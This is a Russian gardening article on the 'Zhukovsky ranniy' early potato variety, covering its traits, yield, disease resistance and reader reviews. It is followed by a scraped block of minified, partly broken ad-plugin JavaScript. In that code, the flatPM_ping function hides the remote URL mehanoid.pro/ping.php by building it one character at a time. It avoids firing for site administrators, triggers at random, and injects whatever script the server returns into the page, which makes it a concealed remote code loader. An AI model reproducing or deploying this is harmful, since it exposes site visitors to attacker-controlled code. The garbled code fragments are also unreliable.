Отзывы о раннем картофеле Жуковский

Заключение

Характеристика и отзывы о сорте картофеля Жуковский ранний будут интересны не только огородникам. Эта культура прекрасно подходит для выращивания в производственных масштабах, поскольку без проблем переносит механическую уборку. Еще одним, безусловно, важным показателем является устойчивость к большинству грибковых заболеваний.

Картофель «Жуковский ранний»: описание сорта, фото и отзывы

Картофель «Жуковский ранний» давно и хорошо знаком огородникам-любителям и профессиональным овощеводам всего постсоветского пространства. Сорт был внесен в Госреестр в 1993 году и по праву считается одним из лучших достижений российской селекции. Авторские права на него принадлежат ФГБНУ «ВНИИ картофельного хозяйства им. А. Г. Лорха» (п/о Красково, Московской области).

В работах по районированию и улучшению сортовых характеристик принимали участие многочисленные оригинаторы, среди которых ФГБНУ «Тульский НИИ сельского хозяйства» (Тульская область), ООО «Элитный картофель» (г. Казань), агрофирма «СеДеК» (Московская область), ФГБНУ «Приморская овощная опытная станция ВНИИО» (Приморский край) и другие.

Сорт адаптирован к различным типам почв и климатическим условиям, рекомендован для выращивания в Северо-Западном, Центральном, Волго-Вятском, Центрально-черноземном, Северо-Кавказском, Средневолжском, Нижневолжском, Уральском, Западно-Сибирском и Дальневосточном регионах.

Картофель «Жуковский ранний» по характеристикам развариваемости относят к типам А/В (салатный, универсальный).

Сведем основные характеристики сорта в таблицу:

Показатель Описание
Общая характеристика Раннеспелый столовый сорт, адаптирован к различным типам почв и климатическим условиям
Период созревания 50-65 дней после полных всходов
Урожайность Средняя – 400-450 ц/га, потенциально до 550-600 ц/га
Товарность 90-92% от общего урожая
Лежкость Средняя
Содержание крахмала 10-12%
Класс/группа в кулинарии Тип А-В (нерассыпчатый или слаборассыпчатый после варки)
Цвет мякоти Белая
Цвет кожуры Розовая
Масса товарных клубней 70-120 г
Количество клубней в кусте 10-15 штук
Потребительские качества Вкус хороший, подходит для отваривания, жарки и запекания, не рекомендуется для приготовления пюре. Пригоден для переработки на хрустящий картофель
Регионы выращивания Северо-Западный, Центральный, Волго-Вятский, Центрально-черноземный, Северо-Кавказский, Средневолжский, Нижневолжский, Уральский, Западно-Сибирский и Дальневосточный
Устойчивость к заболеваниям Высокая: рак картофеля (D1), золотистая и бледная нематоды (Ro1, Ro4), парша обыкновенная. Средняя: вирусы Y, ризоктониоз, бактериоз. Восприимчив к фитофторозу ботвы и клубней
Цвет венчиков От бледно-сиреневого до красно-фиолетового
Особенности выращивания Неприхотлив в уходе, хорошо откликается на обычные агротехнические приемы. Обязательными требованиями остаются прополка и рыхление почвы, окучивание кустов, умеренный полив, комплексные подкормки, профилактические обработки от вредителей
Год включения в ФГБУ «Госсорткомиссия» 1993
Оригинатор ФГБНУ «ВНИИ картофельного хозяйства им. А. Г. Лорха» (п/о Красково, Московская обл.)

Описание

Как понятно из названия, сорт – раннеспелый, предназначен в первую очередь для летне-осеннего потребления, пригоден и для непродолжительного хранения. Клубни молодого картофеля наливаются очень быстро и приобретают товарное качество уже после 40-го дня после всходов (в среднем через 50-65 дней).

Растения небольшие по высоте, стеблевого типа, полураскидистые, с мелкими ярко-зелеными глянцевыми листьями. Период цветения довольно продолжительный, соцветия компактные, цветочные венчики имеют антоциановое окрашивание (от бледно-сиреневого до красно-фиолетового). Ягоды практически не образуются.

Характеристики клубней

«Жуковский ранний» относится к сортам столового назначения, пригоден для переработки на хрустящий картофель.

Клубни имеют красивый товарный вид, средний или крупный размер, массу порядка 100-150 г, округло-овальную выровненную форму. Кожура розовая, гладкая и тонкая, почти прозрачная (особенно при ранней уборке) с мелкими неглубокими глазками, которые отчетливо выделяются на поверхности своим насыщенным красным цветом.

Мякоть слегка сладковатая, белая, не темнеющая при чистке, нарезке и термической обработке. Текстура картошки плотная, не мучнистая, слабо-водянистая. По кулинарным характеристикам сорт относят к типам А/В (салатный, универсальный).

Содержание крахмала низкое – 10-12%. Клубни не развариваются и хорошо сохраняют форму в очищенном виде и «в мундире», после варки легко режутся на кусочки, поэтому используются для салатов. Картофель «Жуковский ранний» по отзывам наиболее хорош в отварном виде на стадии пучковой спелости (молодой), подходит для жарки и запекания, не рекомендуется для приготовления пюре.

Популярность сорта во многом объясняется:

  • высокой товарностью продукции – 90-92% от общего урожая;
  • устойчивостью клубней к механическим повреждениям;
  • стабильной урожайностью;
  • возможностями механизированной уборки, транспортировки и хранения (при надлежащих условиях до 6-7 месяцев).

Выход продукции товарного качества составляет 90-92% от общего урожая.

Урожайность

Количество клубней товарного качества в гнезде может быть средним или высоким (до 10-15 штук). При посадке картофеля в начале мая первый урожай начинают собирать обычно в июле, а основной выкапывают не позднее середины августа. Передерживать клубни в земле не рекомендуется, так как это ведет к ухудшению вкусовых свойств и подгниванию при повышенной влажности почвы.

Показатели товарной урожайности достаточно высокие: порядка 400-450 ц/га, а при благоприятных условиях и соблюдении агротехнических требований до 550-600 ц/га.

При описании картофеля сорта «Жуковский ранний» нужно обязательно отметить его скороспелость и продолжительное по времени клубнеобразование на длинных столонах, активно разрастающихся в стороны. Благодаря такой особенности получать урожай можно постоянно на протяжении всего периода вегетации растения, не выкапывая кусты полностью, а собирая с них по несколько клубней, что особенно удобно при посадках на легких почвах или в солому.

Столоны – подземные стебли растения, на концах которых развиваются клубни.

Устойчивость

Данный сорт считается достаточно выносливым в условиях прохладных температур и недостаточной освещенности, жары и засухи. Его урожайность мало зависит от типа почвы и распространенных заболеваний:

Заболевания Степень устойчивости
Рак картофеля (D1) Высокая
Золотистая картофельная цистообразующая нематода (Ro1) Высокая
Парша обыкновенная Высокая
Вирусы мозаичные (Y) Средняя
Ризоктониоз Средняя
Бактериоз Средняя

К недостаткам сорта «Жуковский ранний» относят его восприимчивость к фитофторозу ботвы и клубней. Чтобы обезопасить клубни от фитофторы, опытные овощеводы советуют срезать всю ботву в конце июля, то есть за 10-14 дней до выкопки основного урожая. Также, если сорт выращивается постоянно в течение многих лет, необходимо время от времени обновлять посадочный материал, приобретая обеззараженный семенной картофель у добросовестных производителей.

«Жуковский ранний» по отзывам большинства овощеводов неприхотлив в уходе и хорошо откликается на обычные агротехнические приемы: прополку и рыхление почвы в междурядьях, окучивание кустов, умеренный полив, комплексные подкормки, профилактические обработки от вредителей.

Отзывы

Тамара, 44 года, г. Вяземский

Мы все любим раннюю молодую картошечку, нежную и сладкую. Для еды каждый год высаживаем сорт Жуковский. Он дает неплохой урожай и клубни очень красивые – снаружи розовые, внутри белые. При варке не разваливаются и не темнеют. На хранение мы эту картошку не оставляем, лежит она максимум до Нового года.

Айдар, 36 лет, республика Башкортостан

Мои родители предпочитают проверенные традиционные сорта картошки. Самым скороспелым считают Жуковский. Я от этого сорта не в восторге. Пока картошка молодая – вкус неплохой, но клубни мелкие, потом клубни вырастают, а вкус и аромат пропадают. Корни расползаются в стороны, и клубни приходится искать при копке на большой площади. Кусты сильно поражаются фитофторой и колорадским жуком. Нужно постоянно обрабатывать. Есть гораздо более урожайные и устойчивые сорта.

Родион, 50 лет, г. Калуга

Сорт Жуковский действительно один из самых ранних. Летом первую картошку начинаем подкапывать уже в конце июня. По вкусу приятная – не липко-крахмалистая, быстро варится, не превращаясь в кашу. Отлично запекается прямо в кожуре. Кожица тонкая, не грубая, легко счищается. Картошка хоть и ранняя, но вполне годится для хранения. У нас в подвале при +4 градусах нормально выдерживает всю зиму. Особых сложностей в уходе не требует. Поливаем ее по возможности, пропалываем и окучиваем. С колорадскими жуками, конечно, боремся постоянно. Урожай получается стабильный, клубней по 8-10 с куста.

Лидия, 54 года, Пермский край

Наш любимый сорт картошки Жуковский нужно обновлять каждые 3-4 года, иначе он начинает чаще болеть, размер клубней и урожайность уменьшаются. В прошлом сезоне мы покупали всего 10 меристимных (выращенных в пробирке) клубней, саживали их на глубину 6-8 см на расстоянии 15-20 см друг от друга. Выкопали в начале августа с одного рядка 1,5 ведра отличной картошки.

Видео

Своим мнением об особенностях сорта «Жуковский ранний» и его урожайности делится опытный огородник в следующем видео:

Несколько лет работала в качестве редактора телевизионной программы с ведущими производителями декоративных растений в Украине. На даче из всех видов аграрных работ предпочитает сбор урожая, но ради этого готова регулярно полоть, тяпать, пасынковать, поливать, подвязывать, прореживать и т. д. Убеждена, что самые вкусные овощи и фрукты – выращенные своими руками!

Нашли ошибку? Выделите текст мышкой и нажмите:

В помощь садоводам и огородникам разработаны удобные приложения для Android. В первую очередь это посевные (лунные, цветочные и т. д.) календари, тематические журналы, подборки полезных советов. С их помощью можно выбрать день, благоприятный для посадки каждого вида растений, определить сроки их созревания и вовремя собрать урожай.

Новинка американских разработчиков – робот Tertill, выполняющий прополку сорняков в огороде. Прибор придуман под руководством Джона Доунза (создателя робота-пылесоса) и работает при любых погодных условиях автономно, передвигаясь по неровной поверхности на колесах. При этом он срезает все растения ниже 3 см встроенным триммером.

Фермер из Оклахомы Карл Бернс вывел необычный сорт разноцветной кукурузы, получивший название Rainbow Corn («радужная»). Зерна на каждом початке – разных цветов и оттенков: коричневые, розовые, фиолетовые, голубые, зеленые и др. Такого результата удалось добиться путем многолетнего отбора наиболее окрашенных обычных сортов и их скрещивания.

В Австралии ученые начали эксперименты по клонированию нескольких сортов винограда, произрастающих в холодных регионах. Потепление климата, которое прогнозируют на ближайшие 50 лет, приведет к их исчезновению. Австралийские сорта имеют отличные характеристики для виноделия и не подвержены распространенным в Европе и Америке заболеваниям.

Собирать лекарственные цветы и соцветия нужно в самом начале периода цветения, когда содержание полезных веществ в них максимально высокое. Цветки положено рвать руками, обрывая грубые цветоножки. Сушат собранные цветы и травы, рассыпав тонким слоем, в прохладном помещении при естественной температуре без доступа прямого солнечного света.

«Морозостойкие» сорта садовой земляники (чаще просто – «клубника») так же нуждаются в укрытии, как и обычные сорта (особенно в тех регионах, где бывают бесснежные зимы или морозы, чередующиеся с оттепелями). У всей земляники корни поверхностные. Это означает, что без укрытия они вымерзают. Уверения продавцов в том, что земляника «морозостойкая», «зимостойкая», «переносит морозы до −35 ℃» и т. д. – обман. Садоводы должны помнить о том, что корневую систему земляники еще никому не удавалось изменить.

Природные токсины содержатся во многих растениях; не исключение и те, которые выращивают в садах и на огородах. Так, в косточках яблок, абрикосов, персиков есть синильная (цианистоводородная) кислота, а в ботве и кожуре недозревших пасленовых (картофеля, баклажанов, помидоров) – соланин. Но не стоит опасаться: их количество слишком незначительно.

Компост – перепревшие органические остатки самого разного происхождения. Как сделать? В кучу, яму или большой ящик складывают все подряд: кухонные остатки, ботву огородных культур, скошенные до цветения сорняки, тонкие веточки. Все это переслаивают фосфоритной мукой, иногда соломой, землей или торфом. (Некоторые дачники добавляют специальные ускорители компостирования.) Накрывают пленкой. В процессе перепревания кучу периодически ворошат или протыкают для притока свежего воздуха. Обычно компост «зреет» 2 года, но с современными добавками может быть готов и за один летний сезон.

Считается, что некоторые овощи и фрукты (огурцы, стеблевой сельдерей, все разновидности капусты, перец, яблоки) обладают «отрицательной калорийностью», то есть при переваривании затрачивается больше калорий, чем в них содержится. На самом деле в пищеварительном процессе расходуется только 10-20% калорий, полученных с едой.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};